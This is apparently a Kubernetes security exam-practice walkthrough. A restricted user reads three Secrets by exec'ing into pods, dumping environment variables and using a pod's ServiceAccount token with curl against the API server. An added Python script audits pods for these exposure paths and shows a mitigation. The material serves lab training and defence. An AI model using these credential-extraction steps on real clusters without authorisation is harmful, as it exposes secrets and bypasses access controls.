Solve this question on: ssh cks3477
You're asked to investigate a possible permission escape using the pre-defined context. The context authenticates as user restricted, which has only limited permissions and shouldn't be able to read Secret values.
Tasks:
k config use-context restricted@infra-prod
k config use-context kubernetes-admin@kubernetes
First, let's switch to the restricted context and check our permissions:
➜ ssh cks3477
➜ candidate@cks3477:~# k config use-context restricted@infra-prod
Switched to context "restricted@infra-prod".
➜ candidate@cks3477:~# k -n restricted get role,rolebinding,clusterrole,clusterrolebinding
Error from server (Forbidden): roles.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "roles" in API group "rbac.authorization.k8s.io" in the namespace "restricted"
Error from server (Forbidden): rolebindings.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "rolebindings" in API group "rbac.authorization.k8s.io" in the namespace "restricted"
Error from server (Forbidden): clusterroles.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "clusterroles" in API group "rbac.authorization.k8s.io" at the cluster scope
Error from server (Forbidden): clusterrolebindings.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "clusterrolebindings" in API group "rbac.authorization.k8s.io" at the cluster scope
Let's try to access secrets directly:
➜ candidate@cks3477:~# k -n restricted get secret
Error from server (Forbidden): secrets is forbidden: User "restricted" cannot list resource "secrets" in API group "" in the namespace "restricted"
Let's check what resources we can access:
➜ candidate@cks3477:~# k -n restricted get all
NAME                    READY   STATUS    RESTARTS   AGE
pod1-fd5d64b9c-pcx6q    1/1     Running   0          37s
pod2-6494f7699b-4hks5   1/1     Running   0          37s
pod3-748b48594-24s76    1/1     Running   0          37s
Let's check the pods for secret mounts:
➜ candidate@cks3477:~# k -n restricted get pod -o yaml | grep -i secret
The first secret is mounted as a file in pod1, so we can read it through exec:
➜ candidate@cks3477:~# k -n restricted exec pod1-fd5d64b9c-pcx6q -- cat /etc/secret-volume/password
you-are
➜ candidate@cks3477:~# echo you-are > /opt/course/12/secret1
pod2 exposes the second secret as an environment variable:
➜ candidate@cks3477:~# k -n restricted exec pod2-6494f7699b-4hks5 -- env | grep PASS
PASSWORD=an-amazing
➜ candidate@cks3477:~# echo an-amazing > /opt/course/12/secret2
Let's check if we can create pods:
➜ candidate@cks3477:~# k -n restricted run test --image=nginx
Error from server (Forbidden): pods is forbidden: User "restricted" cannot create resource "pods" in API group "" in the namespace "restricted"
Let's check if pod3 has a service account token mounted:
➜ candidate@cks3477:~# k -n restricted exec -it pod3-748b48594-24s76 -- sh
➜ / # mount | grep serviceaccount
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
➜ / # ls /run/secrets/kubernetes.io/serviceaccount
ca.crt namespace token
We can use the service account token to query the API server directly from inside the pod; the request succeeds, so this service account is allowed to list Secrets in the namespace:
➜ / # curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k
...
{
  "metadata": {
    "name": "secret3",
    "namespace": "restricted",
    ...
      }
    ]
  },
  "data": {
    "password": "cEVuRXRSYVRpT24tdEVzVGVSCg=="
  },
  "type": "Opaque"
}
...
Let's decode the secret value:
➜ candidate@cks3477:~# echo cEVuRXRSYVRpT24tdEVzVGVSCg== | base64 -d
pEnEtRaTiOn-tEsTeR
➜ candidate@cks3477:~# echo cEVuRXRSYVRpT24tdEVzVGVSCg== | base64 -d > /opt/course/12/secret3
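The three secrets above leaked through three different Pod-level paths: a Secret volume (pod1), a Secret-backed environment variable (pod2) and an auto-mounted ServiceAccount token whose account can list Secrets (pod3). The following audit script is an added example, not part of the original solution or the cluster setup; it walks a Pod list in the JSON shape `kubectl -n restricted get pod -o json` returns and reports each of those exposure paths, then shows the mitigation for the third one (`automountServiceAccountToken: false`). The embedded Pod list is constructed to mirror the walkthrough; the shortened pod names and the ServiceAccount name `pod3-sa` are assumptions.

```python
"""Audit a Pod list (the JSON `kubectl get pod -o json` returns) for the three
Secret exposure paths seen in the walkthrough: Secret volumes, Secret-backed
environment variables, and auto-mounted ServiceAccount tokens.
Added example; sample data below is constructed, not taken from the cluster."""
import json

# Constructed sample: three pods mirroring the walkthrough. Pod names are
# shortened and the ServiceAccount name "pod3-sa" is an assumption.
SAMPLE_POD_LIST = json.loads(r'''
{
  "apiVersion": "v1",
  "kind": "List",
  "items": [
    {
      "metadata": {"name": "pod1", "namespace": "restricted"},
      "spec": {
        "automountServiceAccountToken": false,
        "volumes": [{"name": "secret-volume", "secret": {"secretName": "secret1"}}],
        "containers": [{"name": "app", "image": "nginx",
                        "volumeMounts": [{"name": "secret-volume",
                                          "mountPath": "/etc/secret-volume"}]}]
      }
    },
    {
      "metadata": {"name": "pod2", "namespace": "restricted"},
      "spec": {
        "automountServiceAccountToken": false,
        "containers": [{"name": "app", "image": "nginx",
                        "env": [{"name": "PASSWORD",
                                 "valueFrom": {"secretKeyRef": {"name": "secret2",
                                                                "key": "password"}}}]}]
      }
    },
    {
      "metadata": {"name": "pod3", "namespace": "restricted"},
      "spec": {
        "serviceAccountName": "pod3-sa",
        "containers": [{"name": "app", "image": "nginx"}]
      }
    }
  ]
}
''')


def audit_pod(pod):
    """Return a list of (pod name, exposure path, detail) findings for one Pod."""
    name = pod["metadata"]["name"]
    spec = pod["spec"]
    findings = []

    # Path 1: Secret mounted as a volume (pod1). Anyone with pods/exec on the
    # Pod can read the files under mountPath.
    secret_vols = {v["name"]: v["secret"]["secretName"]
                   for v in spec.get("volumes", []) if "secret" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in secret_vols:
                findings.append((name, "volume",
                                 f"{secret_vols[m['name']]} at {m['mountPath']} in {c['name']}"))
        # Path 2: Secret injected as an environment variable (pod2). Readable via
        # `exec ... env`, and commonly leaked by crash dumps and debug endpoints.
        for e in c.get("env", []):
            ref = e.get("valueFrom", {}).get("secretKeyRef")
            if ref:
                findings.append((name, "env",
                                 f"{ref['name']}/{ref['key']} as ${e['name']} in {c['name']}"))
        for ef in c.get("envFrom", []):
            if "secretRef" in ef:
                findings.append((name, "env",
                                 f"all keys of {ef['secretRef']['name']} in {c['name']}"))

    # Path 3: ServiceAccount token auto-mounted (pod3). The token is projected
    # unless the Pod (or its ServiceAccount) sets automountServiceAccountToken:
    # false; this check only sees the Pod, so it errs on the side of reporting.
    if spec.get("automountServiceAccountToken", True):
        findings.append((name, "sa-token",
                         f"token of {spec.get('serviceAccountName', 'default')} mounted"))
    return findings


def audit_pod_list(pod_list):
    """Audit every Pod in a kubectl List object."""
    findings = []
    for pod in pod_list["items"]:
        findings.extend(audit_pod(pod))
    return findings


def disable_token_automount(pod):
    """Mitigation for path 3: return a copy of the Pod that opts out of the
    projected ServiceAccount token. Path 1 and 2 need the workload changed so
    the Secret is not exposed to whoever holds pods/exec on the Pod."""
    hardened = json.loads(json.dumps(pod))  # deep copy, leave the input untouched
    hardened["spec"]["automountServiceAccountToken"] = False
    return hardened


if __name__ == "__main__":
    for pod_name, path, detail in audit_pod_list(SAMPLE_POD_LIST):
        print(f"{pod_name:6} {path:9} {detail}")
```

Run it against a live namespace by replacing `SAMPLE_POD_LIST` with `json.load(sys.stdin)` and piping in `kubectl -n restricted get pod -o json`. The sa-token finding on its own is only a problem when the ServiceAccount is bound to a Role or ClusterRole that can read Secrets, which is what the successful `curl` against `/api/v1/namespaces/restricted/secrets` above demonstrates; `kubectl auth can-i list secrets -n restricted --as=system:serviceaccount:restricted:<sa-name>` (run from an admin context) confirms that binding without exec'ing into the Pod.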
Finally, let's switch back to the original context:
➜ candidate@cks3477:~$ k config use-context kubernetes-admin@kubernetes
Switched to context "kubernetes-admin@kubernetes".